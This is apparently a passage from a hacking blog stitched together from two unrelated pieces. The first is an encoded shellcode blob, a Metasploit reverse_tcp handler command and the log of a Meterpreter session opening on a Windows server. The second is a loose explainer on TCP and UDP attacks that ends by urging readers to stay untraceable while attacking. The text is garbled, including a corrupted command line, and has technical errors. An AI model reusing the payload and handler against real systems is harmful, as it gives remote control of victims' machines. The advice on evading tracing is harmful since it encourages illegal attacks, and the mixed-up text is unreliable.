kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA
If you head back to the terminal where the multi/handler is running you will happily see:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E
[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 673 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 4444
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo
System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.
Thanks for reading
Regards
Adnan Anjum

TCP/IP & UDP Attacks Introduction

Hello, Lets explain "TCP/IP & UDP Attacks", Most common and effective Web attacks...Lets Know abt its basic and types...

TCP/IP Attacks
1. TCP SYN or TCP ACK Flood Attack
2. TCP Sequence Number Attack
3. TCP/IP

UDP attacks


1. ICMP Attacks
2. Smurf Attacks
3. ICMP Tunneling

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server, these ACK packets tells the server that a connection is requested. The server thus responds to the client with a ACK packet, the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually send and receives the ACK packets but it does not open the session. The server holds these sessions open, awaiting the final packet in the sequence. This cause the server to fill up the available connections and denies any requesting clients access.

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end of the network
for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent the client or the server generates a sequence number. The attacker intercepts and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense of such an attack is to know that its occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing, it involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus it can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - This occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping for instance, that uses the ICMP protocol. sPing is a good example of this type of attack, it overloads te server with more bytes than it can handle, larger connections. Its ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it send back ICMP message traffic information indicating status to the originator. If a broadcast is sent to network, all hosts will answer back to the ping. The result is an overload of network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The counter measure is to deny ICMP traffic on your network.

Warning : ICMP can be very dangerous..and Even,as i said ...Don't try such attack from your pc,untill you don't know that how to be invisible on net ! Beccause once you get traced out ...No one can help you from Troubles..